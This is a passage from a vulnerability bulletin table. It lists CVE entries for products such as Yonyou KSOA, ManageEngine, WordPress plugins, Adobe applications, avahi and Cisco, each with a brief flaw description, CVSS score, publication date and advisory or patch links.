| Yonyou--KSOA | A vulnerability was determined in Yonyou KSOA 9.0. This impacts an unknown function of the file /worksheet/work_info.jsp of the component HTTP GET Parameter Handler. This manipulation of the argument ID causes sql injection. The attack may be initiated remotely. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-18 | 7.3 | CVE-2026-1122 | VDB-341714 | Yonyou KSOA HTTP GET Parameter work_info.jsp sql injection VDB-341714 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #734549 | Yonyou KSOA v9.0 SQL Injection https://github.com/LX-66-LX/cve/issues/8 |
| Yonyou--KSOA | A vulnerability was identified in Yonyou KSOA 9.0. Affected is an unknown function of the file /worksheet/work_mod.jsp of the component HTTP GET Parameter Handler. Such manipulation of the argument ID leads to sql injection. The attack may be launched remotely. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-18 | 7.3 | CVE-2026-1123 | VDB-341715 | Yonyou KSOA HTTP GET Parameter work_mod.jsp sql injection VDB-341715 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #734550 | Yonyou KSOA v9.0 SQL Injection https://github.com/LX-66-LX/cve/issues/9 |
| Yonyou--KSOA | A security flaw has been discovered in Yonyou KSOA 9.0. Affected by this vulnerability is an unknown functionality of the file /worksheet/work_report.jsp of the component HTTP GET Parameter Handler. Performing a manipulation of the argument ID results in sql injection. Remote exploitation of the attack is possible. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-18 | 7.3 | CVE-2026-1124 | VDB-341716 | Yonyou KSOA HTTP GET Parameter work_report.jsp sql injection VDB-341716 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #734551 | Yonyou KSOA v9.0 SQL Injection https://github.com/LX-66-LX/cve/issues/10 |
| zalando--skipper | Skipper is an HTTP router and reverse proxy for service composition. The default skipper configuration before 0.23.0 was -lua-sources=inline,file. The problem starts if untrusted users can create lua filters, because of -lua-sources=inline , for example through a Kubernetes Ingress resource. The configuration inline allows these user to create a script that is able to read the filesystem accessible to the skipper process and if the user has access to read the logs, they an read skipper secrets. This vulnerability is fixed in 0.23.0. | 2026-01-16 | 8.8 | CVE-2026-23742 | https://github.com/zalando/skipper/security/advisories/GHSA-cc8m-98fm-rc9g https://github.com/zalando/skipper/commit/0b52894570773b29e2f3c571b94b4211ef8fa714 https://github.com/zalando/skipper/releases/tag/v0.23.0 |
| Zeslecp--ZesleCP | ZesleCP 3.1.9 contains an authenticated remote code execution vulnerability that allows attackers to create malicious FTP accounts with shell injection payloads. Attackers can exploit the FTP account creation endpoint by injecting a reverse shell command that establishes a network connection to a specified listening host. | 2026-01-15 | 8.8 | CVE-2021-47794 | ExploitDB-50233 ZesleCP Official Website Exploit Demonstration Video VulnCheck Advisory: ZesleCP 3.1.9 - Remote Code Execution (RCE) (Authenticated) |
| Zohocorp--ManageEngine ADSelfService Plus | Zohocorp ManageEngine ADSelfService Plus versions before 6519 are vulnerable to Authentication Bypass due to improper filter configurations. | 2026-01-13 | 9.1 | CVE-2025-11250 | https://www.manageengine.com/products/self-service-password/advisory/CVE-2025-11250.html |
| Zohocorp--ManageEngine PAM360 | Zohocorp ManageEngine PAM360 versions before 8202; Password Manager Pro versions before 13221; Access Manager Plus versions prior to 4401 are vulnerable to an authorization issue in the initiate remote session functionality. | 2026-01-13 | 8.1 | CVE-2025-11669 | https://www.manageengine.com/privileged-access-management/advisory/cve-2025-11669.html |
Medium Vulnerabilities
| Primary Vendor -- Product |
Description | Published | CVSS Score | Source Info | Patch Info |
|---|---|---|---|---|---|
| 1Panel-dev--1Panel | 1Panel is an open-source, web-based control panel for Linux server management. A stored Cross-Site Scripting (XSS) vulnerability exists in the 1Panel App Store when viewing application details. Malicious scripts can execute in the context of the user's browser, potentially compromising session data or sensitive system interfaces. All versions of 1Panel up to and including v1.10.33-lts and v2.0.16 are affected. An attacker could publish a malicious application that, when loaded by users (locally or remotely), can execute arbitrary scripts. This may result in theft of user cookies, unauthorized access to system functions, or other actions that compromise the confidentiality, integrity, and availability of the system. The vulnerability is caused by insufficient sanitization of content rendered by the MdEditor component with the `previewOnly` attribute enabled. Specifically, the App Store renders application README content without proper XSS protection, allowing script execution during content rendering; and similar issues exist in system upgrade-related components, which can be fixed by implementing proper XSS sanitization in the MdEditor component. These vulnerabilities can be mitigated by applying proper XSS protection and sanitization when rendering content in the MdEditor component. Safe versions with a patch incorporated are v1.10.34-lts and v2.0.17. | 2026-01-18 | 6.4 | CVE-2026-23525 | https://github.com/1Panel-dev/1Panel/security/advisories/GHSA-mg24-6h5c-9q42 |
| A-Plus Video Technologies--AP-RM864P | Certain NVR models developed by A-Plus Video Technologies has a Sensitive Data Exposure vulnerability, allowing unauthenticated remote attackers to access the debug page and obtain device status information. | 2026-01-12 | 5.3 | CVE-2026-0853 | https://www.twcert.org.tw/tw/cp-132-10620-527f1-1.html https://www.twcert.org.tw/en/cp-139-10621-55584-2.html |
| aankit--SpiceForms Form Builder | The SpiceForms Form Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'spiceforms' shortcode in all versions up to, and including, 1.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-01-14 | 6.4 | CVE-2025-12178 | https://www.wordfence.com/threat-intel/vulnerabilities/id/d9a19e96-2ca4-4072-aa2e-ab01f1685911?source=cve https://plugins.trac.wordpress.org/browser/spiceforms-form-builder/tags/1.0/spiceform.php#L135 |
| abage--Sosh Share Buttons | The Sosh Share Buttons plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.1.0. This is due to missing nonce validation on the 'admin_page_content' function. This makes it possible for unauthenticated attackers to update the plugin's settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2026-01-14 | 4.3 | CVE-2025-15377 | https://www.wordfence.com/threat-intel/vulnerabilities/id/38b8b563-10a4-4343-b95a-7d09cf6fd729?source=cve https://plugins.trac.wordpress.org/browser/sosh-share-buttons/tags/1.1.0/sosh.class.php#L138 |
| Adobe--Illustrator | Illustrator versions 29.8.3, 30.0 and earlier are affected by a NULL Pointer Dereference vulnerability that could lead to application denial-of-service. An attacker could exploit this vulnerability to crash the application, causing disruption to services. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2026-01-13 | 5.5 | CVE-2026-21288 | https://helpx.adobe.com/security/products/illustrator/apsb26-03.html |
| Adobe--InDesign Desktop | InDesign Desktop versions 21.0, 19.5.5 and earlier are affected by an Out-of-bounds Read vulnerability that could lead to memory exposure. An attacker could leverage this vulnerability to access sensitive information stored in memory. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2026-01-13 | 5.5 | CVE-2026-21278 | https://helpx.adobe.com/security/products/indesign/apsb26-02.html |
| Adobe--Substance3D - Designer | Substance3D - Designer versions 15.0.3 and earlier are affected by an Out-of-bounds Read vulnerability that could lead to memory exposure. An attacker could leverage this vulnerability to disclose sensitive information stored in memory. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2026-01-13 | 5.5 | CVE-2026-21308 | https://helpx.adobe.com/security/products/substance3d_designer/apsb26-13.html |
| Adobe--Substance3D - Modeler | Substance3D - Modeler versions 1.22.4 and earlier are affected by a NULL Pointer Dereference vulnerability that could lead to application denial-of-service. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2026-01-13 | 5.5 | CVE-2026-21300 | https://helpx.adobe.com/security/products/substance3d-modeler/apsb26-08.html |
| Adobe--Substance3D - Modeler | Substance3D - Modeler versions 1.22.4 and earlier are affected by a NULL Pointer Dereference vulnerability that could lead to application denial-of-service. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2026-01-13 | 5.5 | CVE-2026-21301 | https://helpx.adobe.com/security/products/substance3d-modeler/apsb26-08.html |
| Adobe--Substance3D - Modeler | Substance3D - Modeler versions 1.22.4 and earlier are affected by an Out-of-bounds Read vulnerability that could lead to memory exposure. An attacker could leverage this vulnerability to disclose sensitive information stored in memory. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2026-01-13 | 5.5 | CVE-2026-21302 | https://helpx.adobe.com/security/products/substance3d-modeler/apsb26-08.html |
| Adobe--Substance3D - Modeler | Substance3D - Modeler versions 1.22.4 and earlier are affected by an Out-of-bounds Read vulnerability that could lead to memory exposure. An attacker could leverage this vulnerability to disclose sensitive information stored in memory. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2026-01-13 | 5.5 | CVE-2026-21303 | https://helpx.adobe.com/security/products/substance3d-modeler/apsb26-08.html |
| adoncreatives--Testimonials Creator | The Testimonials Creator plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in version 1.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. | 2026-01-14 | 4.4 | CVE-2025-14379 | https://www.wordfence.com/threat-intel/vulnerabilities/id/3af18a17-81a0-4720-b222-153ab4ddf7d9?source=cve https://wordpress.org/plugins/testimonials-creator/ |
| akinloluwami--outray | Outray openSource ngrok alternative. Prior to 0.1.5, this vulnerability allows a user i.e a free plan user to get more than the desired subdomains due to lack of db transaction lock mechanisms in main/apps/web/src/routes/api/$orgSlug/subdomains/index.ts. This vulnerability is fixed in 0.1.5. | 2026-01-14 | 5.9 | CVE-2026-22819 | https://github.com/outray-tunnel/outray/security/advisories/GHSA-45hj-9x76-wp9g https://github.com/outray-tunnel/outray/commit/73e8a09575754fb4c395438680454b2ec064d1d6 |
| aliasvault--aliasvault | AliasVault is a privacy-first password manager with built-in email aliasing. AliasVault Android versions 0.24.0 through 0.25.2 contained an issue in how passkey requests from Android apps were validated. Under certain local conditions, a malicious app could attempt to obtain a passkey response for a site it was not authorized to access. The issue involved incomplete validation of calling app identity, origin, and RP ID in the Android credential provider. This issue was fixed in AliasVault Android 0.25.3. | 2026-01-14 | 6.1 | CVE-2026-22694 | https://github.com/aliasvault/aliasvault/security/advisories/GHSA-mvg4-wvjv-332q https://github.com/aliasvault/aliasvault/issues/1440 https://github.com/aliasvault/aliasvault/pull/1441 https://github.com/aliasvault/aliasvault/commit/b3350473103d6138ab2b63ca130c211717eac67d https://github.com/aliasvault/aliasvault/releases/tag/0.25.3 |
| Altium--Altium Live | A stored cross-site scripting (XSS) vulnerability exists in the Altium Support Center AddComment endpoint due to missing server-side input sanitization. Although the client interface applies HTML escaping, the backend accepts and stores arbitrary HTML and JavaScript supplied via modified POST requests. The injected content is rendered verbatim when support cases are viewed by other users, including support staff with elevated privileges, allowing execution of arbitrary JavaScript in the victim's browser context. | 2026-01-15 | 6.1 | CVE-2026-1011 | https://www.altium.com/platform/security-compliance/security-advisories |
| AmauriC--tarteaucitron.js | tarteaucitron.js is a compliant and accessible cookie banner. Prior to 1.29.0, a Regular Expression Denial of Service (ReDoS) vulnerability was identified in tarteaucitron.js in the handling of the issuu_id parameter. This vulnerability is fixed in 1.29.0. | 2026-01-13 | 4.4 | CVE-2026-22809 | https://github.com/AmauriC/tarteaucitron.js/security/advisories/GHSA-q5f6-qxm2-mcqm https://github.com/AmauriC/tarteaucitron.js/commit/f0bbdac2fdf3cd24a325fc0928c0d34abf1b7b52 |
| aplazopayment--Aplazo Payment Gateway | The Aplazo Payment Gateway plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the check_success_response() function in all versions up to, and including, 1.4.2. This makes it possible for unauthenticated attackers to set any WooCommerce order to `pending payment` status. | 2026-01-14 | 5.3 | CVE-2025-15512 | https://www.wordfence.com/threat-intel/vulnerabilities/id/97b327cc-7a72-4cc3-a4db-a693469f6917?source=cve https://plugins.trac.wordpress.org/browser/aplazo-payment-gateway/tags/1.4.2/includes/module/class-aplazo-module.php#L206 |
| Arunna--Arunna | Arunna 1.0.0 contains a cross-site request forgery vulnerability that allows attackers to manipulate user profile settings without authentication. Attackers can craft a malicious form to change user details, including passwords, email, and administrative privileges by tricking authenticated users into submitting the form. | 2026-01-15 | 5.3 | CVE-2021-47754 | ExploitDB-50608 Archived Researcher Blog Arunna GitHub Repository |
| Automattic--Jetpack | Jetpack 11.4 contains a cross-site scripting vulnerability in the contact form module that allows attackers to inject malicious scripts through the post_id parameter. Attackers can craft malicious URLs with script payloads to execute arbitrary JavaScript in victims' browsers when they interact with the contact form page. | 2026-01-13 | 6.1 | CVE-2023-54332 | ExploitDB-51104 Jetpack WordPress Plugin Homepage VulnCheck Advisory: Jetpack 11.4 - Cross Site Scripting (XSS) |
| avahi--avahi | Avahi is a system which facilitates service discovery on a local network via the mDNS/DNS-SD protocol suite. In 0.9-rc2 and earlier, avahi-daemon can be crashed by sending unsolicited announcements containing CNAME resource records pointing it to resource records with short TTLs. As soon as they expire avahi-daemon crashes. | 2026-01-12 | 6.5 | CVE-2025-68468 | https://github.com/avahi/avahi/security/advisories/GHSA-cp79-r4x9-vf52 https://github.com/avahi/avahi/issues/683 https://github.com/avahi/avahi/commit/f66be13d7f31a3ef806d226bf8b67240179d309a |
| avahi--avahi | Avahi is a system which facilitates service discovery on a local network via the mDNS/DNS-SD protocol suite. In 0.9-rc2 and earlier, avahi-daemon can be crashed by sending 2 unsolicited announcements with CNAME resource records 2 seconds apart. | 2026-01-12 | 6.5 | CVE-2025-68471 | https://github.com/avahi/avahi/security/advisories/GHSA-56rf-42xr-qmmg https://github.com/avahi/avahi/issues/678 https://github.com/avahi/avahi/commit/9c6eb53bf2e290aed84b1f207e3ce35c54cc0aa1 |
| avahi--avahi | Avahi is a system which facilitates service discovery on a local network via the mDNS/DNS-SD protocol suite. In 0.9-rc2 and earlier, an unprivileged local users can crash avahi-daemon (with wide-area disabled) by creating record browsers with the AVAHI_LOOKUP_USE_WIDE_AREA flag set via D-Bus. This can be done by either calling the RecordBrowserNew method directly or creating hostname/address/service resolvers/browsers that create those browsers internally themselves. | 2026-01-12 | 5.5 | CVE-2025-68276 | https://github.com/avahi/avahi/security/advisories/GHSA-mhf3-865v-g5rc https://github.com/avahi/avahi/pull/806 https://github.com/avahi/avahi/commit/ede7048475c5d47d53890e3bc1350dda8e0b3688 |
| Awesome Motive--YouTube Feed Pro | The Feeds for YouTube Pro plugin for WordPress is vulnerable to arbitrary file read in all versions up to, and including, 2.6.0 via the 'sby_check_wp_submit' AJAX action. This is due to insufficient sanitization of user-supplied data and the use of that data in a file operation. This makes it possible for unauthenticated attackers to read the contents of arbitrary files on the server, which can contain sensitive information, granted the 'Save Featured Images' setting is enabled and 'Disable WP Posts' is disabled. Note: This vulnerability only affects the Pro version of Feeds for YouTube. | 2026-01-17 | 5.9 | CVE-2025-12002 | https://www.wordfence.com/threat-intel/vulnerabilities/id/e9f31ec5-c376-45b1-9ffe-35c80b89b60d?source=cve https://smashballoon.com/youtube-feed/ https://plugins.trac.wordpress.org/browser/feeds-for-youtube/trunk/inc/sby-functions.php#L1047 https://plugins.trac.wordpress.org/browser/feeds-for-youtube/trunk/inc/sby-functions.php#L1038 https://plugins.trac.wordpress.org/browser/feeds-for-youtube/trunk/inc/Services/AdminAjaxService.php#L25 https://plugins.trac.wordpress.org/browser/feeds-for-youtube/trunk/inc/Services/AdminAjaxService.php#L339 https://plugins.trac.wordpress.org/browser/feeds-for-youtube/trunk/inc/Services/AdminAjaxService.php#L383 |
| awesomesupport--Awesome Support WordPress HelpDesk & Support Plugin | The Awesome Support - WordPress HelpDesk & Support Plugin for WordPress is vulnerable to authorization bypass due to missing capability checks in all versions up to, and including, 6.3.6. This is due to the 'wpas_do_mr_activate_user' function not verifying that a user has permission to modify other users' roles, combined with a nonce reuse vulnerability where public registration nonces are valid for privileged actions because all actions share the same nonce namespace. This makes it possible for unauthenticated attackers to demote administrators to low-privilege roles via the 'wpas-do=mr_activate_user' action with a user-controlled 'user_id' parameter, granted they can access the publicly available registration/submit ticket page to extract a valid nonce. | 2026-01-16 | 6.5 | CVE-2025-12641 | https://www.wordfence.com/threat-intel/vulnerabilities/id/a5a8e4ca-c16b-4e9d-8ad2-5a671fdbc49a?source=cve https://plugins.trac.wordpress.org/browser/awesome-support/tags/6.3.5/includes/functions-actions.php#L36 https://plugins.trac.wordpress.org/browser/awesome-support/tags/6.3.5/includes/functions-actions.php#L66 https://plugins.trac.wordpress.org/browser/awesome-support/tags/6.3.5/includes/functions-user.php#L1686 https://plugins.trac.wordpress.org/browser/awesome-support/tags/6.3.5/themes/default/registration.php#L183 https://plugins.trac.wordpress.org/changeset/3435609/awesome-support/trunk/includes/functions-user.php?contextall=1 |
| axllent--mailpit | Mailpit is an email testing tool and API for developers. Prior to version 1.28.3, Mailpit's SMTP server is vulnerable to Header Injection due to an insufficient Regular Expression used to validate `RCPT TO` and `MAIL FROM` addresses. An attacker can inject arbitrary SMTP headers (or corrupt existing ones) by including carriage return characters (`\r`) in the email address. This header injection occurs because the regex intended to filter control characters fails to exclude `\r` and `\n` when used inside a character class. Version 1.28.3 fixes this issue. | 2026-01-18 | 5.3 | CVE-2026-23829 | https://github.com/axllent/mailpit/security/advisories/GHSA-54wq-72mp-cq7c https://github.com/axllent/mailpit/commit/36cc06c125954dec6673219dafa084e13cc14534 https://github.com/axllent/mailpit/releases/tag/v1.28.3 |
| B2Evolution--b2evolution | b2evolution 7.2.2 contains a cross-site request forgery vulnerability that allows attackers to modify admin account details without authentication. Attackers can craft a malicious HTML form to submit unauthorized changes to user profiles by tricking victims into loading a specially crafted webpage. | 2026-01-15 | 5.3 | CVE-2021-47800 | ExploitDB-50081 Official Vendor Homepage Software Download Page B2Evolution GitHub Repository VulnCheck Advisory: b2evolution 7.2.2 - 'edit account details' Cross-Site Request Forgery (CSRF) |
| bastillion-io--Bastillion | A vulnerability has been found in bastillion-io Bastillion up to 4.0.1. This vulnerability affects unknown code of the file src/main/java/io/bastillion/manage/control/AuthKeysKtrl.java of the component Public Key Management System. Such manipulation leads to command injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-17 | 4.7 | CVE-2026-1063 | VDB-341631 | bastillion-io Bastillion Public Key Management System AuthKeysKtrl.java command injection VDB-341631 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #731303 | bastillion-io Bastillion <=4.0.1 Command Injection https://github.com/AnalogyC0de/public_exp/blob/main/archives/Bastillion/report1.md |
| bastillion-io--Bastillion | A vulnerability was found in bastillion-io Bastillion up to 4.0.1. This issue affects some unknown processing of the file src/main/java/io/bastillion/manage/control/SystemKtrl.java of the component System Management Module. Performing a manipulation results in command injection. The attack can be initiated remotely. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-17 | 4.7 | CVE-2026-1064 | VDB-341632 | bastillion-io Bastillion System Management SystemKtrl.java command injection VDB-341632 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #731308 | bastillion-io Bastillion SSH Key Manager <=4.0.1 Command Injection https://github.com/AnalogyC0de/public_exp/blob/main/archives/Bastillion/report2.md |
| bdthemes--Spin Wheel Interactive spinning wheel that offers coupons | The Spin Wheel plugin for WordPress is vulnerable to client-side prize manipulation in all versions up to, and including, 2.1.0. This is due to the plugin trusting client-supplied prize selection data without server-side validation or randomization. This makes it possible for unauthenticated attackers to manipulate which prize they win by modifying the 'prize_index' parameter sent to the server, allowing them to always select the most valuable prizes. | 2026-01-17 | 5.3 | CVE-2026-0808 | https://www.wordfence.com/threat-intel/vulnerabilities/id/c023b91e-f633-41a6-b2d7-bcb3f1d026b7?source=cve https://plugins.trac.wordpress.org/browser/spin-wheel/trunk/includes/class-swp-ajax.php#L73 https://plugins.trac.wordpress.org/browser/spin-wheel/tags/2.0.2/includes/class-swp-ajax.php#L73 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3437726%40spin-wheel&new=3437726%40spin-wheel&sfp_email=&sfph_mail= |
| BlackBerry Ltd--QNX Software Development Platform | Null pointer dereference in the MsgRegisterEvent() system call could allow an attacker with local access and code execution abilities to crash the QNX Neutrino kernel. | 2026-01-13 | 6.2 | CVE-2025-8090 | https://support.blackberry.com/pkb/s/article/141027 |
| bplugins--Team Section Block Showcase Team Members with Layout Options | The Team Section Block plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's block in all versions up to, and including, 2.0.0 due to insufficient input sanitization and output escaping on user-supplied social network link URLs. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-01-17 | 6.4 | CVE-2026-0833 | https://www.wordfence.com/threat-intel/vulnerabilities/id/6348b119-a0dc-40ef-ae62-1de86dcefac7?source=cve https://plugins.trac.wordpress.org/browser/team-section/trunk/build/render.php#L3 https://plugins.trac.wordpress.org/browser/team-section/tags/1.1.0/build/render.php#L3 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3436953%40team-section&new=3436953%40team-section&sfp_email=&sfph_mail= |
| brechtvds--WP Recipe Maker | The WP Recipe Maker plugin for WordPress is vulnerable to Information Exposure in versions up to, and including, 10.2.2 via the api_get_post_summary function due to insufficient restrictions on which posts can be retrieved. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract data from posts they may not be able to edit or read otherwise. This also affects password protected, private, or draft posts that they should not have access to. | 2026-01-16 | 4.3 | CVE-2025-15527 | https://www.wordfence.com/threat-intel/vulnerabilities/id/96f77fdc-4e91-43c0-8bc6-7bb202945c7d?source=cve https://plugins.trac.wordpress.org/browser/wp-recipe-maker/trunk/includes/public/api/class-wprm-api-utilities.php#L48 https://plugins.trac.wordpress.org/browser/wp-recipe-maker/trunk/includes/public/api/class-wprm-api-utilities.php#L86 https://plugins.trac.wordpress.org/browser/wp-recipe-maker/trunk/includes/public/api/class-wprm-api-utilities.php#L172 https://plugins.trac.wordpress.org/changeset/3415263/wp-recipe-maker/trunk/includes/public/api/class-wprm-api-utilities.php?contextall=1&old=3402554&old_path=%2Fwp-recipe-maker%2Ftrunk%2Fincludes%2Fpublic%2Fapi%2Fclass-wprm-api-utilities.php |
| BYVoid--OpenCC | A weakness has been identified in BYVoid OpenCC up to 1.1.9. This vulnerability affects the function opencc::MaxMatchSegmentation of the file src/MaxMatchSegmentation.cpp. This manipulation causes heap-based buffer overflow. The attack is restricted to local execution. The exploit has been made available to the public and could be used for attacks. Patch name: 345c9a50ab07018f1b4439776bad78a0d40778ec. To fix this issue, it is recommended to deploy a patch. | 2026-01-18 | 5.3 | CVE-2025-15536 | VDB-341708 | BYVoid OpenCC MaxMatchSegmentation.cpp MaxMatchSegmentation heap-based overflow VDB-341708 | CTI Indicators (IOB, IOC, IOA) Submit #733347 | BYVoid OpenCC ver.1.1.9 and master-branch Heap-based Buffer Overflow https://github.com/BYVoid/OpenCC/issues/997 https://github.com/BYVoid/OpenCC/pull/1005 https://github.com/oneafter/1222/blob/main/repro https://github.com/BYVoid/OpenCC/commit/345c9a50ab07018f1b4439776bad78a0d40778ec |
| cakephp--cakephp | CakePHP is a rapid development framework for PHP. The PaginatorHelper::limitControl() method has a cross-site-scripting vulnerability via query string parameter manipulation. This issue has been fixed in 5.2.12 and 5.3.1. | 2026-01-16 | 5.4 | CVE-2026-23643 | https://github.com/cakephp/cakephp/security/advisories/GHSA-qh8m-9qxx-53m5 https://github.com/cakephp/cakephp/issues/19172 https://github.com/cakephp/cakephp/commit/c842e7f45d85696e6527d8991dd72f525ced955f https://bakery.cakephp.org/2026/01/14/cakephp_5212.html https://github.com/cakephp/cakephp/releases/tag/5.2.12 https://github.com/cakephp/cakephp/releases/tag/5.3.1 |
| cbutlerjr--WP-Members Membership Plugin | The WP-Members Membership Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Multiple Checkbox and Multiple Select user profile fields in all versions up to, and including, 3.5.4.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-01-15 | 5.4 | CVE-2025-14448 | https://www.wordfence.com/threat-intel/vulnerabilities/id/89d1fa00-4757-4f86-bddb-a6a2dbcf9625?source=cve https://plugins.trac.wordpress.org/changeset/3418471/wp-members |
| Celestialsoftware--AbsoluteTelnet | AbsoluteTelnet 11.24 contains a denial of service vulnerability that allows local attackers to crash the application by manipulating DialUp connection and license name fields. Attackers can generate a 1000-character payload and paste it into specific input fields to trigger application crashes and force unexpected termination. | 2026-01-15 | 6.2 | CVE-2021-47764 | ExploitDB-50511 Vendor Homepage |
| Celestialsoftware--AbsoluteTelnet | AbsoluteTelnet 11.24 contains a denial of service vulnerability that allows local attackers to crash the application by manipulating username and error report fields. Attackers can trigger the crash by inserting 1000 characters into the username or email address fields, causing the application to become unresponsive. | 2026-01-15 | 6.2 | CVE-2021-47765 | ExploitDB-50510 Vendor Homepage |
| Chamilo--LMS | A security flaw has been discovered in Chamilo LMS up to 2.0.0 Beta 1. This issue affects the function deleteLegal of the file src/CoreBundle/Controller/SocialController.php of the component Legal Consent Handler. Performing a manipulation of the argument userId results in improper authorization. The attack is possible to be carried out remotely. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-18 | 5.4 | CVE-2026-1106 | VDB-341698 | Chamilo LMS Legal Consent SocialController.php deleteLegal improper authorization VDB-341698 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #731510 | Chamilo LMS <= v2.0.0 Beta 1 SocialController IDOR - Legal Consent Data Manipulat https://note-hxlab.wetolink.com/share/w92t1Q0a74Gj |
| cijliu--librtsp | A security vulnerability has been detected in cijliu librtsp up to 2ec1a81ad65280568a0c7c16420d7c10fde13b04. The affected element is the function rtsp_rely_dumps. The manipulation leads to buffer overflow. An attack has to be approached locally. This product is using a rolling release to provide continious delivery. Therefore, no version details for affected nor updated releases are available. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-18 | 5.3 | CVE-2026-1108 | VDB-341700 | cijliu librtsp rtsp_rely_dumps buffer overflow VDB-341700 | CTI Indicators (IOB, IOC, IOA) Submit #732598 | librtsp demo git-master-2ec1a81ad65280568a0c7c16420d7c10fde13b04 Buffer Overflow https://github.com/fizz-is-on-the-way/vuls_protocol/blob/main/librtsp_rtsp_rely_dumps/librtsp_rtsp_rely_dumps.md |
| cijliu--librtsp | A vulnerability was detected in cijliu librtsp up to 2ec1a81ad65280568a0c7c16420d7c10fde13b04. The impacted element is the function rtsp_parse_request. The manipulation results in buffer overflow. Attacking locally is a requirement. This product takes the approach of rolling releases to provide continious delivery. Therefore, version details for affected and updated releases are not available. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-18 | 5.3 | CVE-2026-1109 | VDB-341701 | cijliu librtsp rtsp_parse_request buffer overflow VDB-341701 | CTI Indicators (IOB, IOC, IOA) Submit #732599 | librtsp demo git-master-2ec1a81ad65280568a0c7c16420d7c10fde13b04 Buffer Overflow https://github.com/fizz-is-on-the-way/vuls_protocol/blob/main/librtsp_rtsp_parse_request/librtsp_rtsp_parse_request.md |
| cijliu--librtsp | A flaw has been found in cijliu librtsp up to 2ec1a81ad65280568a0c7c16420d7c10fde13b04. This affects the function rtsp_parse_method. This manipulation causes buffer overflow. It is possible to launch the attack on the local host. Continious delivery with rolling releases is used by this product. Therefore, no version details of affected nor updated releases are available. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-18 | 5.3 | CVE-2026-1110 | VDB-341702 | cijliu librtsp rtsp_parse_method buffer overflow VDB-341702 | CTI Indicators (IOB, IOC, IOA) Submit #732603 | librtsp demo git-master-2ec1a81ad65280568a0c7c16420d7c10fde13b04 Buffer Overflow https://github.com/fizz-is-on-the-way/vuls_protocol/blob/main/librtsp_rtsp_parse_method/librtsp_rtsp_parse_method.md |
| Cinspiration--RDP Manager | RDP Manager 4.9.9.3 contains a denial of service vulnerability in connection input fields that allows local attackers to crash the application. Attackers can add oversized entries in Verbindungsname and Server fields to permanently freeze and crash the software, potentially requiring full reinstallation. | 2026-01-15 | 6.2 | CVE-2021-47771 | ExploitDB-50484 Archived Software Download Page Vulnerability-Lab Disclosure |
| Cisco--Cisco Evolved Programmable Network Manager (EPNM) | A vulnerability in the web-based management interface of Cisco Evolved Programmable Network Manager (EPNM) and Cisco Prime Infrastructure could allow an authenticated, remote attacker to conduct a stored cross-site scripting (XSS) attack against users of the interface of an affected system. This vulnerability exists because the web-based management interface does not properly validate user-supplied input. An attacker could exploit this vulnerability by inserting malicious code into specific data fields in the interface. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information. To exploit this vulnerability, an attacker must have valid administrative credentials. | 2026-01-15 | 4.8 | CVE-2026-20075 | cisco-sa-epnm-pi-stored-xss-GEkX8yWK |
| Cisco--Cisco Identity Services Engine Software | A vulnerability in the web-based management interface of Cisco Identity Services Engine (ISE) and Cisco ISE Passive Identity Connector (ISE-PIC) could allow an authenticated, remote attacker to conduct cross-site scripting (XSS) attacks against a user of the interface. This vulnerability is due to insufficient validation of user-supplied input by the web-based management interface of an affected system. An attacker could exploit this vulnerability by injecting malicious code into specific pages of the interface. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information. To exploit this vulnerability, the attacker must have valid administrative credentials. | 2026-01-15 | 4.8 | CVE-2026-20047 | cisco-sa-ise-xss-964cdxW5 |
